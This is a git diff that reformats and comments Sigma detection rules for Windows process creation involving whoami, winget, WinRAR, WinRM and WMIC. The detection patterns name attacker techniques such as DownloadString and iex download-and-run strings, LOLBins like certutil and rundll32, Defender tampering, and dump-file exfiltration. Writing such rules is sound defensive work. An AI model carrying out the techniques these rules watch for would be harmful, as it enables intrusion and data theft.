a/sigma/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml index a5c583288..ce6222779 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml @@ -1,9 +1,7 @@ title: Group Membership Reconnaissance Via Whoami.EXE id: bd8b828d-0dca-48e1-8a63-8a58ecf2644f status: test -description: Detects the execution of whoami.exe with the /group command line flag - to show group membership for the current user, account type, security identifiers - (SID), and attributes. +description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /groups' - ' -groups' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_output.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_output.yml index 90b496eb1..57b738f4f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_output.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_output.yml @@ -1,9 +1,7 @@ title: Whoami.EXE Execution With Output Option id: c30fb093-1109-4dc8-88a8-b30d11c95a5d status: experimental -description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV - as output format or with redirection options to export the results to a file for - later use. +description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ @@ -23,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_main_img: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_main_cli: - CommandLine|contains: + CommandLine|contains: - ' /FO CSV' - ' -FO CSV' selection_special: - CommandLine|contains: whoami*> + CommandLine|contains: whoami*> condition: process_creation and (all of selection_main_* or selection_special) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml index f1b1dffbb..63a1913b1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml @@ -21,9 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe filter_main_known_parents: + # This list can be any legitimate shell or application that you expect whoami to run from ParentProcessName|endswith: - \cmd.exe - \powershell_ise.exe @@ -32,11 +33,10 @@ detection: filter_optional_ms_monitoring_agent: ParentProcessName|endswith: :\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe filter_main_parent_null: - ParentProcessName: null + ParentProcessName: filter_main_parent_empty: ParentProcessName: '' - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml index 0c62ffda4..57d1fa497 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml @@ -1,9 +1,7 @@ title: Security Privileges Enumeration Via Whoami.EXE id: 97a80ec7-0e2f-4d05-9ef4-65760e634f6b status: test -description: Detects a whoami.exe executed with the /priv command line flag instructing - the tool to show all current user privileges. This is often used after a privilege - escalation attempt. +description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami author: Florian Roth (Nextron Systems) @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /priv' - ' -priv' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/sigma/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml index ac4b26731..af85ef486 100644 --- a/sigma/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/sigma/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml @@ -1,8 +1,7 @@ title: Suspicious WindowsTerminal Child Processes id: 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 status: test -description: Detects suspicious children spawned via the Windows Terminal application - which could be a sign of persistence via WindowsTerminal (see references section) +description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) references: - https://persistence-info.github.io/Data/windowsterminalprofile.html - https://twitter.com/nas_bench/status/1550836225652686848 @@ -24,40 +23,43 @@ detection: - \WindowsTerminal.exe - \wt.exe selection_susp: - - NewProcessName|endswith: - - \rundll32.exe - - \regsvr32.exe - - \certutil.exe - - \cscript.exe - - \wscript.exe - - \csc.exe - - NewProcessName|contains: - - C:\Users\Public\ - - \Downloads\ - - \Desktop\ - - \AppData\Local\Temp\ - - \Windows\TEMP\ - - CommandLine|contains: - - ' iex ' - - ' icm' - - Invoke- - - 'Import-Module ' - - 'ipmo ' - - DownloadString( - - ' /c ' - - ' /k ' - - ' /r ' + - NewProcessName|endswith: + # Add more LOLBINS + - \rundll32.exe + - \regsvr32.exe + - \certutil.exe + - \cscript.exe + - \wscript.exe + - \csc.exe + - NewProcessName|contains: + # Add more suspicious paths + - C:\Users\Public\ + - \Downloads\ + - \Desktop\ + - \AppData\Local\Temp\ + - \Windows\TEMP\ + - CommandLine|contains: + # Add more suspicious commandline + - ' iex ' + - ' icm' + - Invoke- + - 'Import-Module ' + - 'ipmo ' + - DownloadString( + - ' /c ' + - ' /k ' + - ' /r ' filter_builtin_visual_studio_shell: - CommandLine|contains|all: + CommandLine|contains|all: - Import-Module - Microsoft.VisualStudio.DevShell.dll - Enter-VsDevShell filter_open_settings: - CommandLine|contains|all: + CommandLine|contains|all: - \AppData\Local\Packages\Microsoft.WindowsTerminal_ - \LocalState\settings.json filter_vsdevcmd: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Program Files\Microsoft Visual Studio\ - \Common7\Tools\VsDevCmd.bat condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml b/sigma/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml index 73bdd0311..b81bc0085 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml @@ -1,10 +1,10 @@ title: Add New Download Source To Winget id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 related: - - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 - type: similar - - id: c15a46a0-07d4-4c87-b4b6-89207835a83b - type: similar + - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 + type: similar + - id: c15a46a0-07d4-4c87-b4b6-89207835a83b + type: similar status: experimental description: Detects usage of winget to add new additional download sources references: @@ -24,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \winget.exe - - OriginalFileName: winget.exe + - NewProcessName|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml b/sigma/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml index 5b3ff7c72..f7f0b3048 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml @@ -1,17 +1,14 @@ title: Add Insecure Download Source To Winget id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 related: - - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 - type: similar - - id: c15a46a0-07d4-4c87-b4b6-89207835a83b - type: similar + - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 + type: similar + - id: c15a46a0-07d4-4c87-b4b6-89207835a83b + type: similar status: experimental -description: 'Detects usage of winget to add a new insecure (http) download source. - - Winget will not allow the addition of insecure sources, hence this could indicate - potential suspicious activity (or typos) - - ' +description: | + Detects usage of winget to add a new insecure (http) download source. + Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) references: - https://learn.microsoft.com/en-us/windows/package-manager/winget/source - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget @@ -29,10 +26,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \winget.exe - - OriginalFileName: winget.exe + - NewProcessName|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' - http:// diff --git a/sigma/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml b/sigma/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml index 2d52b19d3..c1dd89d2e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml @@ -1,10 +1,10 @@ title: Add Potential Suspicious New Download Source To Winget id: c15a46a0-07d4-4c87-b4b6-89207835a83b related: - - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 - type: similar - - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 - type: similar + - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 + type: similar + - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 + type: similar status: experimental description: Detects usage of winget to add new potentially suspicious download sources references: @@ -25,14 +25,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \winget.exe - - OriginalFileName: winget.exe + - NewProcessName|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' selection_source_direct_ip: - CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} + # This is a best effort. A better way to handle this is to limit it via whitelist. Check Group Policy for more details + CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml b/sigma/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml index ee617d357..f67fe3ea2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml @@ -1,15 +1,10 @@ title: Install New Package Via Winget Local Manifest id: 313d6012-51a0-4d93-8dfc-de8553239e25 status: experimental -description: 'Detects usage of winget to install applications via manifest file. Adversaries - can abuse winget to download payloads remotely and execute them. - - The manifest option enables you to install an application by passing in a YAML - file directly to the client. - +description: | + Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. + The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later. - - ' references: - https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install - https://lolbas-project.github.io/lolbas/Binaries/Winget/ @@ -29,19 +24,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \winget.exe - - OriginalFileName: winget.exe + - NewProcessName|endswith: \winget.exe + - OriginalFileName: winget.exe selection_install_flag: - CommandLine|contains: + CommandLine|contains: - install - - ' add ' + - ' add ' # https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCLICore/Commands/InstallCommand.h selection_manifest_flag: - CommandLine|contains: + CommandLine|contains: - '-m ' - --manifest condition: process_creation and (all of selection_*) falsepositives: - - Some false positives are expected in some environment that may use this functionality - to install and test their custom applications + - Some false positives are expected in some environment that may use this functionality to install and test their custom applications level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml b/sigma/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml index 2d19febf0..102d72de0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml @@ -1,11 +1,10 @@ title: Winrar Compressing Dump Files id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc related: - - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 - type: similar + - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 + type: similar status: experimental -description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" - extension, which could be a step in a process of dump file exfiltration. +description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ author: Florian Roth (Nextron Systems) @@ -22,19 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \rar.exe - - \winrar.exe - - Description: Command line RAR + - NewProcessName|endswith: + - \rar.exe + - \winrar.exe + - Description: Command line RAR selection_extension: - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears - accidentally + - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml index 6e1b046cc..2aaddd7c7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious Child Process Of WinRAR.EXE id: 146aace8-9bd6-42ba-be7a-0070d8027b76 related: - - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 - type: similar + - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 + type: similar status: experimental description: Detects potentially suspicious child processes of WinRAR.exe. references: @@ -23,24 +23,25 @@ detection: selection_parent: ParentProcessName|endswith: \WinRAR.exe selection_binaries: - - NewProcessName|endswith: - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - mshta.exe - - PowerShell.EXE - - pwsh.dll - - regsvr32.exe - - RUNDLL32.EXE - - wscript.exe + # Note: add additional binaries that the attacker might use + - NewProcessName|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - mshta.exe + - PowerShell.EXE + - pwsh.dll + - regsvr32.exe + - RUNDLL32.EXE + - wscript.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml b/sigma/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml index 7c9a52156..ffad2e3a7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml @@ -1,8 +1,7 @@ title: Winrar Execution in Non-Standard Folder id: 4ede543c-e098-43d9-a28f-dd784a13132f status: test -description: Detects a suspicious winrar execution in a folder which is not the default - installation folder +description: Detects a suspicious winrar execution in a folder which is not the default installation folder references: - https://twitter.com/cyb3rops/status/1460978167628406785 author: Florian Roth (Nextron Systems), Tigzy @@ -19,20 +18,21 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \rar.exe - - \winrar.exe - - Description: Command line RAR + - NewProcessName|endswith: + - \rar.exe + - \winrar.exe + - Description: Command line RAR filter_main_unrar: - NewProcessName|endswith: \UnRAR.exe + # Note: we filter unrar as it has the same description as the other utilities, and we're only interested in compression + NewProcessName|endswith: \UnRAR.exe filter_main_path: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\WinRAR\ - :\Program Files\WinRAR\ filter_optional_temp: - NewProcessName|contains: :\Windows\Temp\ - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + # Note: in some occasion installers were seen dropping "rar" in TEMP + NewProcessName|contains: :\Windows\Temp\ + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate use of WinRAR in a folder of a software that bundles WinRAR level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml index 68966d53f..545da510f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml @@ -1,8 +1,7 @@ title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl id: 074e0ded-6ced-4ebd-8b4d-53f55908119d status: test -description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via - winrm.vbs and copied cscript.exe (can be renamed) +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) references: - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 author: Julia Fomina, oscd.community @@ -19,19 +18,18 @@ detection: EventID: 4688 Channel: Security contains_format_pretty_arg: - CommandLine|contains: + CommandLine|contains: - format:pretty - format:"pretty" - format:"text" - format:text image_from_system_folder: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ contains_winrm: - CommandLine|contains: winrm - condition: process_creation and (contains_winrm and (contains_format_pretty_arg - and not image_from_system_folder)) + CommandLine|contains: winrm + condition: process_creation and (contains_winrm and (contains_format_pretty_arg and not image_from_system_folder)) falsepositives: - Unlikely level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml b/sigma/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml index 9632692a5..7155d2fef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml @@ -1,8 +1,7 @@ title: Remote Code Execute via Winrm.vbs id: 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 status: test -description: Detects an attempt to execute code or create service on remote host via - winrm.vbs. +description: Detects an attempt to execute code or create service on remote host via winrm.vbs. references: - https://twitter.com/bohops/status/994405551751815170 - https://redcanary.com/blog/lateral-movement-winrm-wmi/ @@ -21,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cscript.exe - - OriginalFileName: cscript.exe + # Note: winrm.vbs can only be run by a process named cscript (see "IsCScriptEnv" function) + - NewProcessName|endswith: \cscript.exe + - OriginalFileName: cscript.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - winrm - invoke Create wmicimv2/Win32_ - -r:http diff --git a/sigma/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml b/sigma/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml index 71c8b6009..9e3c54d30 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml @@ -1,9 +1,7 @@ title: Remote PowerShell Session Host Process (WinRM) id: 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 status: test -description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM - host process) as a parent or child process (sign of an active PowerShell remote - session). +description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). references: - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -21,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \wsmprovhost.exe - - ParentProcessName|endswith: \wsmprovhost.exe + - NewProcessName|endswith: \wsmprovhost.exe + - ParentProcessName|endswith: \wsmprovhost.exe condition: process_creation and selection fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml index 73fc3df12..44b5f80db 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Processes Spawned by WinRM id: 5cc2cda8-f261-4d88-a2de-e9e193c86716 status: test -description: Detects suspicious processes including shells spawnd from WinRM host - process +description: Detects suspicious processes including shells spawnd from WinRM host process author: Andreas Hunkeler (@Karneades), Markus Neis date: 2021/05/20 modified: 2022/07/14 @@ -20,7 +19,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \wsmprovhost.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \sh.exe - \bash.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_winzip_password_compression.yml b/sigma/builtin/process_creation/proc_creation_win_winzip_password_compression.yml index 6f9bbee16..28e8e135d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winzip_password_compression.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winzip_password_compression.yml @@ -1,8 +1,7 @@ title: Compress Data and Lock With Password for Exfiltration With WINZIP id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d status: test -description: An adversary may compress or encrypt data that is collected prior to - exfiltration using 3rd party utilities +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: frack113 @@ -19,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection_winzip: - CommandLine|contains: + CommandLine|contains: - winzip.exe - winzip64.exe selection_password: - CommandLine|contains: -s" + CommandLine|contains: -s" selection_other: - CommandLine|contains: + CommandLine|contains: - ' -min ' - ' -a ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml b/sigma/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml index 861e99d6d..c4a3e116b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml @@ -21,10 +21,10 @@ detection: selection: ParentProcessName|endswith: \EdgeTransport.exe filter_conhost: - NewProcessName: C:\Windows\System32\conhost.exe - filter_oleconverter: - NewProcessName|startswith: C:\Program Files\Microsoft\Exchange Server\ - NewProcessName|endswith: \Bin\OleConverter.exe + NewProcessName: C:\Windows\System32\conhost.exe + filter_oleconverter: # FP also documented in https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=18 + NewProcessName|startswith: C:\Program Files\Microsoft\Exchange Server\ + NewProcessName|endswith: \Bin\OleConverter.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml b/sigma/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml index 2a60d9dab..9f90e790d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml @@ -19,13 +19,11 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName: C:\WINDOWS\system32\wbem\scrcons.exe + NewProcessName: C:\WINDOWS\system32\wbem\scrcons.exe ParentProcessName: C:\Windows\System32\svchost.exe condition: process_creation and selection falsepositives: - Legitimate event consumers - - Dell computers on some versions register an event consumer that is known to - cause false positives when brightness is changed by the corresponding keyboard - button + - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml index 1ed306368..980f701c9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml @@ -1,8 +1,7 @@ title: New ActiveScriptEventConsumer Created Via Wmic.EXE id: ebef4391-1a81-4761-a40a-1db446c0e625 status: test -description: Detects WMIC executions in which an event consumer gets created. This - could be used to establish persistence +description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence references: - https://twitter.com/johnlatwc/status/1408062131321270282?s=12 - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ActiveScriptEventConsumer - ' CREATE ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml index b484f0d03..b4321fc16 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml @@ -1,8 +1,7 @@ title: Potential Windows Defender Tampering Via Wmic.EXE id: 51cbac1e-eee3-4a90-b1b7-358efb81fa0a status: test -description: Detects potential tampering with Windows Defender settings such as adding - exclusion using wmic +description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_cli: - CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender + CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_process_creation.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_process_creation.yml index 07361dfa8..085ac6cc9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_process_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_process_creation.yml @@ -1,11 +1,10 @@ title: New Process Created Via Wmic.EXE id: 526be59f-a573-4eea-b5f7-f0973207634d related: - - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 - type: derived + - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 # For suspicious process creation + type: derived status: test -description: Detects new process creation using WMIC via the "process call create" - flag +description: Detects new process creation using WMIC via the "process call create" flag references: - https://www.sans.org/blog/wmic-for-incident-response/ - https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - process - call - create diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml index 04a71d3f4..555edd508 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml @@ -1,8 +1,7 @@ title: Computer System Reconnaissance Via Wmic.EXE id: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f status: test -description: Detects execution of wmic utility with the "computersystem" flag in order - to obtain information about the machine such as the domain, username, model, etc. +description: 